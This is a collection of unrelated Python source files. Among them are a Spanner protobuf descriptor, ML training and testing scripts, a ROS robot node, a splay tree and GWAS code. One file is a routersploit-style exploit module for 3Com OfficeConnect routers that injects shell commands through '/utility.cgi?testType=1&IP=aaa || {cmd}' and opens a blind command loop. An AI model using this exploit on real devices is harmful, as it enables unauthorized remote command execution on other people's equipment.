"\202\323\344\223\002:*8/v1/{name=projects/*/instances/*/databases/*/sessions/*}\332A\004name"
),
),
_descriptor.MethodDescriptor(
name="ExecuteSql",
full_name="google.spanner.v1.Spanner.ExecuteSql",
index=5,
containing_service=None,
input_type=_EXECUTESQLREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET,
serialized_options=_b(
'\202\323\344\223\002K"F/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeSql:\001*'
),
),
_descriptor.MethodDescriptor(
name="ExecuteStreamingSql",
full_name="google.spanner.v1.Spanner.ExecuteStreamingSql",
index=6,
containing_service=None,
input_type=_EXECUTESQLREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._PARTIALRESULTSET,
serialized_options=_b(
'\202\323\344\223\002T"O/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeStreamingSql:\001*'
),
),
_descriptor.MethodDescriptor(
name="ExecuteBatchDml",
full_name="google.spanner.v1.Spanner.ExecuteBatchDml",
index=7,
containing_service=None,
input_type=_EXECUTEBATCHDMLREQUEST,
output_type=_EXECUTEBATCHDMLRESPONSE,
serialized_options=_b(
'\202\323\344\223\002P"K/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeBatchDml:\001*'
),
),
_descriptor.MethodDescriptor(
name="Read",
full_name="google.spanner.v1.Spanner.Read",
index=8,
containing_service=None,
input_type=_READREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET,
serialized_options=_b(
'\202\323\344\223\002E"@/v1/{session=projects/*/instances/*/databases/*/sessions/*}:read:\001*'
),
),
_descriptor.MethodDescriptor(
name="StreamingRead",
full_name="google.spanner.v1.Spanner.StreamingRead",
index=9,
containing_service=None,
input_type=_READREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._PARTIALRESULTSET,
serialized_options=_b(
'\202\323\344\223\002N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:streamingRead:\001*'
),
),
_descriptor.MethodDescriptor(
name="BeginTransaction",
full_name="google.spanner.v1.Spanner.BeginTransaction",
index=10,
containing_service=None,
input_type=_BEGINTRANSACTIONREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTION,
serialized_options=_b(
'\202\323\344\223\002Q"L/v1/{session=projects/*/instances/*/databases/*/sessions/*}:beginTransaction:\001*\332A\017session,options'
),
),
_descriptor.MethodDescriptor(
name="Commit",
full_name="google.spanner.v1.Spanner.Commit",
index=11,
containing_service=None,
input_type=_COMMITREQUEST,
output_type=_COMMITRESPONSE,
serialized_options=_b(
'\202\323\344\223\002G"B/v1/{session=projects/*/instances/*/databases/*/sessions/*}:commit:\001*\332A session,transaction_id,mutations\332A(session,single_use_transaction,mutations'
),
),
_descriptor.MethodDescriptor(
name="Rollback",
full_name="google.spanner.v1.Spanner.Rollback",
index=12,
containing_service=None,
input_type=_ROLLBACKREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=_b(
'\202\323\344\223\002I"D/v1/{session=projects/*/instances/*/databases/*/sessions/*}:rollback:\001*\332A\026session,transaction_id'
),
),
_descriptor.MethodDescriptor(
name="PartitionQuery",
full_name="google.spanner.v1.Spanner.PartitionQuery",
index=13,
containing_service=None,
input_type=_PARTITIONQUERYREQUEST,
output_type=_PARTITIONRESPONSE,
serialized_options=_b(
'\202\323\344\223\002O"J/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionQuery:\001*'
),
),
_descriptor.MethodDescriptor(
name="PartitionRead",
full_name="google.spanner.v1.Spanner.PartitionRead",
index=14,
containing_service=None,
input_type=_PARTITIONREADREQUEST,
output_type=_PARTITIONRESPONSE,
serialized_options=_b(
'\202\323\344\223\002N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionRead:\001*'
),
),
],
)
_sym_db.RegisterServiceDescriptor(_SPANNER)
DESCRIPTOR.services_by_name["Spanner"] = _SPANNER
# @@protoc_insertion_point(module_scope)
|
from sqlalchemy import MetaData, Table, Column, Integer, String, Text
_COLUMNS = {
'id': Column('id', Integer, primary_key=True),
'name': Column('name', String(100)),
'algorithm': Column('algorithm', String(100)),
'value': Column('value', Integer),
'category': Column('category', String(100)),
'date': Column('date', String(200)),
'extras': Column('extras', String(200)),
'matches': Column('matches', Text),
'text': Column('text', Text),
'start': Column('start', Integer),
'end': Column('end', Integer),
}
def create_table(tablename, columns, eng):
employees = Table(tablename, MetaData(),
*(col for col in _COLUMNS if not columns or col in columns))
employees.create(eng)
def format_data_as_dict(number, doc, algo_name, res):
d = {
'id': number,
'name': doc.name,
'algorithm': algo_name,
'value': res.result,
'category': res.value,
'date': res.date,
'extras': res.extras,
'matches': tuple(m.matchobj.string for m in doc.matches),
'text': res.text,
'start': res.start,
'end': res.end,
}
def data_from_columns(columns):
return {k: v for k, v in d.items() if k in columns}
return data_from_columns
|
from pyhcl.passes import check_form, check_types, check_widths, check_flows, infer_types, infer_widths
from pyhcl.ir.low_ir import *
class CheckAndInfer:
@staticmethod
def run(c: Circuit):
c = check_form.CheckHighForm(c).run()
c = infer_types.InferTypes().run(c)
c = infer_widths.InferWidths().run(c)
c = check_types.CheckTypes().run(c)
c = check_flows.CheckFlow().run(c)
c = check_widths.CheckWidths().run(c)
return c
|
# For n disks, total 2^n โ 1 moves are required.
def towersOfHanoi(n,from_stack,to_stack,aux_stack):
if n == 1:
print("Moved disc {} from {} to {}".format(n,from_stack, to_stack))
else:
towersOfHanoi(n-1, from_stack, aux_stack, to_stack)
print("Moved disc {} from {} to {}".format(n,from_stack, to_stack))
towersOfHanoi(n - 1, aux_stack, to_stack, from_stack)
def test():
n = 4
towersOfHanoi(n,'A', 'B', 'C')
test() |
# Put your name and student ID here before submitting!
# Name (ID)
import random
# uncomment one of the two lines below, depending on which library you want to use
# import tensorflow
# import torch
class NNAgent:
def __init__(self, id):
self.id = id
# initialise your neural network here
def make_move(self, game):
# use your neural network to make a move here
return game.board.random_free()
def __str__(self):
return f'Player {self.id} (NNAgent)'
|
from __future__ import division
from mmcv.parallel import MMDataParallel
from ..core import AttrPredictor, AttrCalculator, CateCalculator
from ..datasets import build_dataloader
from .env import get_root_logger
import numpy as np
import pandas as pd
def test_predictor(model,
dataset,
cfg,
distributed=False,
validate=False,
logger=None):
""" test attribute prediction
:return top-k accuracy """
if logger is None:
logger = get_root_logger(cfg.log_level)
# start testing predictor
if distributed: # to do
_dist_test_attr(model, dataset, cfg, validate=validate)
else:
_non_dist_test_attr(model, dataset, cfg, validate=validate)
def test_cate_attr_predictor(model,
dataset,
cfg,
distributed=False,
validate=False,
logger=None):
"""test category and attribute prediction
:return top-k attribute_accuracy,
top-k category recall rate """
if logger is None:
logger = get_root_logger(cfg.log_level)
# start testing predictor
if distributed: # to do
_dist_test_cate_attr(model, dataset, cfg, validate=validate)
else:
_non_dist_test_cate_attr(model, dataset, cfg, validate=validate)
def _non_dist_test_attr(model, dataset, cfg, validate=False):
data_loader = build_dataloader(
dataset,
cfg.data.imgs_per_gpu,
cfg.data.workers_per_gpu,
len(cfg.gpus.test),
dist=False,
shuffle=False)
print('dataloader built')
model = MMDataParallel(model, device_ids=cfg.gpus.test).cuda()
model.eval()
attr_predictor = AttrPredictor(cfg.data.test)
img_ids, prob_preds = None, None
for batch_idx, testdata in enumerate(data_loader):
if batch_idx % cfg.print_interval == 0:
print("batch %d" % batch_idx)
img_id = testdata["img_id"].data.cpu().numpy()
imgs = testdata['img']
landmark = testdata['landmark']
attr_pred = model(imgs, attr=None, landmark=landmark, return_loss=False)
prob_pred = attr_predictor.show_prediction(img_id, attr_pred)
if not img_ids:
img_ids = img_id
prob_preds = prob_pred
else:
img_ids = np.concatenate([img_ids, img_id], axis=0)
prob_preds = np.concatenate([prob_preds, prob_pred], axis=0)
if batch_idx % cfg.save_interval == 0:
print("save intermediate prediction result")
attr_pred.save_prediction(img_ids, prob_preds, cfg.output_path)
print("save final prediction result")
attr_pred.save_prediction(img_ids, prob_preds, cfg.output_path)
def _non_dist_test_cate_attr(model, dataset, cfg, validate=False):
data_loader = build_dataloader(
dataset,
cfg.data.imgs_per_gpu,
cfg.data.workers_per_gpu,
len(cfg.gpus.test),
dist=False,
shuffle=False)
print('dataloader built')
model = MMDataParallel(model, device_ids=cfg.gpus.test).cuda()
model.eval()
attr_calculator = AttrCalculator(
cfg,
topns=[3, 5],
show_attr_name=True,
attr_name_file=cfg.data.test['attr_cloth_file'])
cate_calculator = CateCalculator(cfg, topns=[1, 3, 5])
for batch_idx, testdata in enumerate(data_loader):
imgs = testdata['img']
landmark = testdata['landmark']
attr = testdata['attr']
cate = testdata['cate']
attr_pred, cate_pred = model(
imgs, attr, landmark=landmark, return_loss=False)
attr_calculator.collect_result(attr_pred, attr)
cate_calculator.collect_result(cate_pred, cate)
if batch_idx % cfg.print_interval == 0:
attr_calculator.show_result(batch_idx)
cate_calculator.show_result(batch_idx)
attr_calculator.show_result()
attr_calculator.show_per_attr_result()
cate_calculator.show_result()
def _dist_test_attr(model, dataset, cfg, validate=False):
raise NotImplementedError
def _dist_test_cate_attr(model, dataset, cfg, validate=False):
raise NotImplementedError
|
"""Full training script"""
import logging
from azureml.core import Dataset#, ScriptRunConfig, Environment
from azureml.core.compute import ComputeTarget
from azureml.core.experiment import Experiment
from azureml.automl.core.forecasting_parameters import ForecastingParameters
from azureml.train.automl import AutoMLConfig
from azureml.train.automl.run import AutoMLRun
import pandas as pd
from authentication import ws
logging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')
def pd_dataframe_register(
df=None,
def_blob_store=None,
name=None,
desc=None):
"""Register pandas dataframe"""
full_dataset = Dataset.Tabular.register_pandas_dataframe(
dataframe=df,
target=def_blob_store,
name=name,
description=desc
)
full_dataset = full_dataset.with_timestamp_columns('date')
def create_register_datasets(source=None,full_dataset_name=None,
training_set_name=None,
test_set_name=None
):
"""Register the full dataset, including the training/test set"""
df = pd.read_csv(source)
train = df[:-10]
test = df[-10:]
def_blob_store = ws.get_default_datastore()
pd_dataframe_register(df=df, def_blob_store=def_blob_store, name=full_dataset_name)
pd_dataframe_register(df=train, def_blob_store=def_blob_store,name=training_set_name)
pd_dataframe_register(df=test, def_blob_store=def_blob_store, name=test_set_name)
def model_train(dataset=None, compute_target=None, experiment_name=None):
"""Model and train with AutoML the dataset"""
forecasting_parameters = ForecastingParameters(
time_column_name='date',
forecast_horizon=12,
target_rolling_window_size=3, # for simple regression, comment this
feature_lags='auto',# for simple regression, comment this
target_lags=12,# for simple regression, comment this
freq='D',
validate_parameters=True)
# Setup the classifier
automl_settings = {
"task": 'forecasting',
"primary_metric":'normalized_root_mean_squared_error',
"iteration_timeout_minutes": 30,
"experiment_timeout_hours": 1.0,
"compute_target":compute_target,
"max_concurrent_iterations": 4,
"featurization": "off",
#"allowed_models":['AutoArima', 'Prophet'],
#"blocked_models":['XGBoostClassifier'],
#"verbosity": logging.INFO,
"training_data":dataset,#.as_named_input('retrain_dataset'),
"label_column_name":'close',
"n_cross_validations": 3,
"enable_voting_ensemble":True,
"enable_early_stopping": False,
"model_explainability":True,
"enable_dnn":True,
"forecasting_parameters": forecasting_parameters
}
automl_config = AutoMLConfig(**automl_settings)
experiment = Experiment(ws, experiment_name)
remote_run = experiment.submit(automl_config, show_output=True, wait_post_processing=True)
remote_run.wait_for_completion()
logging.info(f'Run details: {remote_run}')
# Convert to AutoMLRun object
remote_run = AutoMLRun(experiment, run_id=remote_run.id)
return remote_run
def register_best_model(
remote_run=None,
model_name=None,
model_path=None,
description=None
):
"""Register the best model from the AutoML Run"""
best_child = remote_run.get_best_child()
model = best_child.register_model(
model_name = model_name,
model_path = model_path,
description = description,
)
logging.info(f"Registered {model_name}, with {description}")
return model
def main():
"""Main operational flow"""
# Declare key objects
ticker = 'FB'
full_dataset_name = 'Full dataset for ' + str(ticker)
training_set_name = 'Training set for ' + str(ticker)
test_set_name = 'Test set for ' + str(ticker)
experiment_name = 'stock_price_timeseries'
compute_target = ComputeTarget(workspace=ws, name='cpu-cluster')
create_register_datasets(source='./datasets/stock_data.csv',
full_dataset_name= full_dataset_name,
training_set_name= training_set_name,
test_set_name = test_set_name
)
# Train the model
ds = Dataset.get_by_name(workspace=ws, name=training_set_name)
remote_run = model_train(
dataset=ds,
compute_target= compute_target,
experiment_name=experiment_name)
# Register the best model
register_best_model(
remote_run = remote_run,
model_name='stock_price_model',
model_path='outputs/model.pkl',
description='Stock price model'
)
if __name__ == "__main__":
main()
|
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "3Com OfficeConnect RCE",
"description": "Module exploits 3Com OfficeConnect remote command execution "
"vulnerability which allows executing command on operating system level.",
"authors": (
"Andrea Fabizi", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://www.exploit-db.com/exploits/9862/",
),
"devices": (
"3Com OfficeConnect",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
response1 = self.http_request(
method="GET",
path="/utility.cgi?testType=1&IP=aaa",
)
if response1 and response1.status_code == 200:
path = "/{}.cgi".format(utils.random_text(32))
response2 = self.http_request(
method="GET",
path=path,
)
if not response2 or response1.text != response2.text:
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target does not seem to be vulnerable")
else:
print_error("Exploit failed - target does not seem to be vulnerable")
def execute(self, cmd):
path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd)
self.http_request(
method="GET",
path=path,
)
return ""
@mute
def check(self):
return None # there is no reliable way to check if target is vulnerable
|
from match import match
from reddit import reddit
from freeRotation import freeRotation
from email_me import email_me
from twitch import twitch
from slack import slack
import time
class index:
def __init__(self):
self.match = match()
self.reddit = reddit()
self.email_me = email_me()
self.twitch = twitch()
self.freeRotation = freeRotation()
self.slack = slack()
def run(self):
self.match.getMatches()
matches = self.match.formatMatches()
streams = self.twitch.getStreams()
freeRotation = self.freeRotation.buildRotation()
# self.reddit.setup()
self.reddit.connect()
self.reddit.updateSidebar(matches, streams, freeRotation)
self.slack.postToSlack(matches, streams, freeRotation)
# self.email_me.populate_email('Heroes Bot Posted', matches)
# self.email_me.send_email()
#self.sidebar.run()
if __name__ == '__main__':
bot = index()
bot.run()
|
#! /usr/bin/env python
import rospy
import actionlib
from actionlib_msgs.msg import GoalStatusArray, GoalStatus
from move_base_msgs.msg import MoveBaseAction
from door_pass.door_utils import DoorUtils
class DoorPass(object):
def __init__(self):
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
n_closed_door=rospy.get_param("~n_closed_door", 40)
self.log_checks = rospy.get_param("~log_checks", False)
self.door_utils=DoorUtils(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door = n_closed_door)
self.mon_nav_status_sub=rospy.Subscriber("/monitored_navigation/status", GoalStatusArray, self.mon_nav_status_cb)
self.door_as=actionlib.SimpleActionServer('doorPassing', MoveBaseAction, execute_cb = self.execute_cb, auto_start=False)
self.door_as.start()
self.door_as.register_preempt_callback(self.door_as_preempt_cb)
self.mon_nav_executing=False
def mon_nav_status_cb(self, data):
result=False
for goal in data.status_list:
if goal.status==GoalStatus.ACTIVE:
result=True
break
self.mon_nav_executing=result
def execute_cb(self, goal):
self.door_utils.activate()
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
n_closed_door=rospy.get_param("~n_closed_door", 40)
self.door_utils.set_params(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door=n_closed_door)
target_pose=goal.target_pose.pose
rospy.loginfo("Door pass action server calling rotate towards pose")
self.door_utils.rotate_towards_pose(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
rospy.loginfo("Door pass action server calling check door")
door_open=self.door_utils.check_door(target_pose, log_to_mongo = self.log_checks)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if door_open:
rospy.loginfo("The door is open. Door pass action server is calling pass door")
success=self.door_utils.pass_door(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if success:
self.finish_execution(GoalStatus.SUCCEEDED)
return
else:
self.finish_execution(GoalStatus.ABORTED)
return
else:
rospy.loginfo("Door is closed. Disabling monitored navigation recoveries.")
current_mon_nav_recover_states=rospy.get_param("/monitored_navigation/recover_states/", {})
for mon_nav_recover_state in current_mon_nav_recover_states:
rospy.set_param("/monitored_navigation/recover_states/" + mon_nav_recover_state, [False,0])
self.finish_execution(GoalStatus.ABORTED)
#wait for mon nav to output failure and get recover states back on
timeout=0
while self.mon_nav_executing and not self.door_as.is_preempt_requested() and timeout<30:
rospy.loginfo("Waiting for monitored navigation to stop executing")
rospy.sleep(0.1)
timeout=timeout+1
rospy.loginfo("Monitored navigation stopped executing. Resetting monitored navigation recoveries.")
rospy.set_param("/monitored_navigation/recover_states/", current_mon_nav_recover_states)
return
def finish_execution(self, status):
rospy.loginfo("Door passing finished with outcome " + GoalStatus.to_string(status))
self.door_utils.deactivate()
if status==GoalStatus.SUCCEEDED:
self.door_as.set_succeeded()
if status==GoalStatus.ABORTED:
self.door_as.set_aborted()
if status==GoalStatus.PREEMPTED:
self.door_as.set_preempted()
def door_as_preempt_cb(self):
self.door_utils.deactivate()
def main(self):
rospy.spin()
if __name__ == '__main__':
rospy.init_node("door_pass_node")
passer=DoorPass()
passer.main()
|
s = raw_input()
if s.count("AB") > 0 and s.count("BA") > 0 and s.count("AB")+s.count("BA")-s.count("ABA")-s.count("BAB") >= 2:
print "YES"
else:
print "NO" |
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import logging
from typing import Callable, Iterable, List
from .constructor_generator import gather_all_constructors_in_hierarchy
from .inspect_parser import extract_parameters, extract_qualified_name
from .model import AssignmentModel
from .model_generator import ModelGenerator
LOG: logging.Logger = logging.getLogger(__name__)
class ConstructorInitializedAttributeSourceGenerator(ModelGenerator[AssignmentModel]):
"""
This Generator will taint the attributes initialized by the constructors of
'classes_to_taint' and their descendants. Only descendants that have had
their modules loaded at preprocessing time will be tainted. Models are
generated on a best effort basis by assuming the name of the parameter will
match the name of the attribute it is assigned to. This naive approach means
this model generator will likely generate some invalid models.
"""
def __init__(
self,
classes_to_taint: List[str],
taint_annotation: str = "TaintSource[UserControlled]",
) -> None:
self.classes_to_taint: List[str] = classes_to_taint
self.taint_annotation: str = taint_annotation
def gather_functions_to_model(self) -> Iterable[Callable[..., object]]:
return gather_all_constructors_in_hierarchy(self.classes_to_taint)
def compute_models(
self, functions_to_model: Iterable[Callable[..., object]]
) -> Iterable[AssignmentModel]:
for constructor in functions_to_model:
qualified_name = extract_qualified_name(constructor)
if not qualified_name:
continue
parameters = extract_parameters(constructor)
for parameter in parameters:
if parameter.name == "self":
continue
# Strip off __init__ and append the parameter name as an attribute
# name (we're hoping that they're named the same)
target = ".".join(qualified_name.split(".")[:-1] + [parameter.name])
yield AssignmentModel(target=target, annotation=self.taint_annotation)
|
class Node:
def __init__(self, key, data, parent=None, left=None, right=None):
self.key = key
self.data = data
self.parent = parent
self.left = left
self.right = right
class SplayTree:
def __init__(self):
self.root = None
def zig(self, p):
x = p.left
p.left = x.right
if x.right:
x.right.parent = p
x.parent = p.parent
if not p.parent:
self.root = x
elif p == p.parent.right:
p.parent.right = x
else:
p.parent.left = x
x.right = p
p.parent = x
def zag(self, p):
x = p.right
p.right = x.left
if x.left:
x.left.parent = p
x.parent = p.parent
if not p.parent:
self.root = x
elif p == p.parent.right:
p.parent.right = x
else:
p.parent.left = x
x.left = p
p.parent = x
def splay(self, x):
while x.parent:
if not x.parent.parent:
if x == x.parent.left:
self.zig(x.parent)
else:
self.zag(x.parent)
elif x == x.parent.left and x.parent == x.parent.parent.left:
self.zig(x.parent.parent)
self.zig(x.parent)
elif x == x.parent.right and x.parent == x.parent.parent.right:
self.zag(x.parent.parent)
self.zag(x.parent)
elif x == x.parent.right and x.parent == x.parent.parent.left:
self.zag(x.parent)
self.zig(x.parent)
else:
self.zig(x.parent)
self.zag(x.parent)
def add(self, key, data):
x = self.root
parent = None
while x:
if key == x.key:
self.splay(x)
raise(Exception)
parent = x
if key < x.key:
x = x.left
else:
x = x.right
temp = Node(key, data, parent=parent)
if not parent:
self.root = temp
elif key < parent.key:
parent.left = temp
else:
parent.right = temp
self.splay(temp)
def set(self, key, data):
if not self.root:
print('error')
return
temp = self.root
parent = None
while temp:
if key == temp.key:
temp.data = data
self.splay(temp)
return
parent = temp
if key < temp.key:
temp = temp.left
else:
temp = temp.right
self.splay(parent)
print('error')
def delete(self, key):
if not self.root:
print('error')
return
x = self.root
temp = parent = None
while x:
if key == x.key:
temp = x
parent = x
if key < x.key:
x = x.left
else:
x = x.right
if not temp:
self.splay(parent)
print('error')
return
self.splay(temp)
leftChild = None
rightChild = None
if temp.right:
rightChild = temp.right
rightChild.parent = None
if temp.left:
leftChild = temp.left
leftChild.parent = None
if not leftChild:
self.root = rightChild
return
if not rightChild:
self.root = leftChild
return
while leftChild.right:
leftChild = leftChild.right
self.splay(leftChild)
leftChild.right = rightChild
rightChild.parent = leftChild
self.root = leftChild
def min(self):
if not self.root:
print('error')
return
temp = self.root
while temp.left:
temp = temp.left
print(temp.key, temp.data)
self.splay(temp)
def max(self):
if not self.root:
print('error')
return
temp = self.root
while temp.right:
temp = temp.right
print(temp.key, temp.data)
self.splay(temp)
def search(self, key):
if not self.root:
print('0')
return
temp = self.root
parent = None
while temp:
if temp.key == key:
print('1', temp.data)
self.splay(temp)
return
elif key < temp.key:
parent = temp
temp = temp.left
else:
parent = temp
temp = temp.right
self.splay(parent)
print('0')
def print(self):
if not self.root:
print('_')
return
queue = [self.root]
index = 0
height = 0
out = ''
while len(queue):
print(queue)
print()
lineLen = 1 << height
_cycle = False
for q in queue:
if isinstance(q, Node):
_cycle = True
if not _cycle:
if index != 0:
out += '_ ' * (lineLen - index)
print(out[0:-1])
return
temp = queue.pop(0)
if isinstance(temp, Node):
if temp.left:
queue.append(temp.left)
else:
queue.append(0)
if temp.right:
queue.append(temp.right)
else:
queue.append(0)
index += 1
out += '[' + str(temp.key) + ' ' + temp.data
if not height:
out += ']\n'
else:
if index != lineLen:
out += ' ' + str(temp.parent.key) + '] '
else:
out += ' ' + str(temp.parent.key) + ']\n'
else:
amount = 1 << temp
out += '_ ' * amount
index += amount
queue.append(temp + 1)
if index == lineLen:
out += '\n'
if index == lineLen:
index = 0
height += 1
cycle = True
tree = SplayTree()
while cycle:
try:
line = input()
cmd = line.split(' ', 2)
try:
if len(cmd) == 1 and cmd[0] == '':
continue
if len(cmd) == 2 and cmd[0] == '' and cmd[1] == '':
continue
if cmd[0] == 'add':
tree.add(int(cmd[1]), cmd[2])
elif cmd[0] == 'set':
tree.set(int(cmd[1]), cmd[2])
elif cmd[0] == 'delete':
tree.delete(int(cmd[1]))
elif cmd[0] == 'search':
tree.search(int(cmd[1]))
elif cmd[0] == 'min':
tree.min()
elif cmd[0] == 'max':
tree.max()
elif cmd[0] == 'print':
tree.print()
else:
raise(Exception)
except Exception:
print('error')
continue
except Exception:
cycle = False |
# noqa: F408, F401
import pytest
from opennem.settings.schema import OpennemSettings
def test_opennem_imports() -> None:
try:
import opennem
hasattr(opennem, "core")
except Exception:
pytest.fail("Could not import main module")
def test_opennem_version() -> None:
import opennem
assert isinstance(opennem.__version__, str), "Version is a string"
assert len(opennem.__version__) > 1, "Version is not empty"
assert "." in opennem.__version__, "Version is somewhat versiony"
assert len(opennem.__version__.split(".")) > 2, "Version is more versiony"
def test_opennem_path() -> None:
import opennem
assert hasattr(opennem, "__path__"), "Module has a path"
assert isinstance(opennem.__path__, list), "Path is a list" # type: ignore
def test_opennem_settings() -> None:
import opennem
assert hasattr(opennem, "settings"), "We have settings"
assert isinstance(opennem.settings, OpennemSettings), "Settings is an openem settings schema"
|
__author__ = "alvaro barbeira"
import logging
import pandas
import numpy
from . import SummaryInputation
from ..data_management import TextFileTools
from ..file_formats import Parquet
from ..file_formats.gwas import Utilities as GWASUtilities
from ..individual_data.Utilities import StudyBasedContext
from ..miscellaneous import Genomics
from ..miscellaneous import PandasHelpers
########################################################################################################################
class _Mixin:
def __init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps):
self.gwas_data = _parse_gwas(gwas)
self.cutoff = cutoff
self.regularization = regularization
self.frequency_filter = frequency_filter
self._standardise_dosages = standardise_dosages
self._keep_palindromic_imputation = keep_palindromic_imputation
self._use_palindromic_snps = use_palindromic_snps
def get_gwas_slice(self, variants_metadata=None, variant=None):
return _gwas_for_slice(self.gwas_data, variants_metadata, variant)
def get_cutoff(self): return self.cutoff
def get_regularization(self): return self.regularization
def get_freq_filter(self): return self.frequency_filter
def standardise_dosages(self): return self._standardise_dosages
def keep_palindromic_imputation(self): return self._keep_palindromic_imputation
def use_palindromic_snps(self): return self._use_palindromic_snps
class VariantContext(StudyBasedContext, _Mixin, SummaryInputation._VariantContext):
def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
super().__init__(study, None, window)
_Mixin.__init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps)
self.target_variants_metadata = specific_target_variants if specific_target_variants is not None else study.get_variants_metadata()
def get_target_variants_metadata(self):
return self.target_variants_metadata
class CachingVariantContext(VariantContext):
def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
super().__init__(study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants, keep_palindromic_imputation, use_palindromic_snps)
self.cache = {}
def get_variants(self, variants):
return _get_variants_cached(variants, self.study, self.cache)
def _get_variants_cached(variants, study, cache):
req = [x for x in variants if not x in cache]
if len(req):
v = study.get_variants(req)
for k in v:
cache[k] = v[k].values
return {k:cache[k] for k in variants}
########################################################################################################################
class RegionContext(StudyBasedContext, _Mixin, SummaryInputation._RegionContext):
def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, regions, standardise_dosages=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
super().__init__(study, None, window)
_Mixin.__init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps)
self.target_regions = regions
def get_target_regions(self):
return self.target_regions
########################################################################################################################
def _parse_gwas(gwas):
gwas = gwas[~gwas.zscore.isna()]
logging.log(9, "Parsing GWAS")
g = {}
for i,t in enumerate(gwas.itertuples()):
if t.zscore == "NA":
continue
if not t.chromosome in g:
g[t.chromosome] = {}
c = g[t.chromosome]
#Yeah, here is where pandas' reading the position column as a float bites us
if numpy.isnan(t.position): continue
_pos = int(t.position)
if not _pos in c:
c[_pos] = {}
c = c[_pos]
z = float(t.zscore)
c[t.effect_allele] = {}
c[t.effect_allele][t.non_effect_allele] = (z, t.variant_id)
c[t.non_effect_allele] = {}
c[t.non_effect_allele][t.effect_allele] = (-z, t.variant_id)
return g
def _gwas_for_slice(gwas_data, variants_metadata, variant):
if variants_metadata is None and variant is not None:
variants_metadata = pandas.DataFrame(
[(variant.id, variant.chromosome, variant.position, variant.non_effect_allele, variant.effect_allele, variant.effect_allele_frequency)],
columns=["id", "chromosome", "position", "non_effect_allele", "effect_allele", "effect_allele_frequency"])
d = []
for i,t in enumerate(variants_metadata.itertuples()):
chr = "chr{}".format(t.chromosome)
if not chr in gwas_data: continue
c = gwas_data[chr]
if not t.position in c: continue
c = c[t.position]
if not t.effect_allele in c: continue
c = c[t.effect_allele]
if not t.non_effect_allele in c: continue
zscore, id = c[t.non_effect_allele]
#Use the GTEx id? id = t.rsid
d.append((id, t.id, t.chromosome, t.position, t.effect_allele, t.non_effect_allele, t.effect_allele_frequency, zscore, None, "measured"))
return pandas.DataFrame(d, columns=SummaryInputation.Results._fields)
def load_gwas(args, use_specific_targets):
"""Watch out! Pandas parser on occasion reads the column `position` as integer. Yikes."""
columns = ["variant_id", "panel_variant_id", "chromosome", "position", "non_effect_allele", "effect_allele","zscore"]
if use_specific_targets is not None:
logging.info("Acquiring filter tree for %d targets", use_specific_targets.shape[0])
tree = GWASUtilities.get_chromosome_position_tree(use_specific_targets)
filter = GWASUtilities.get_filter(tree)
logging.info("Processing gwas source")
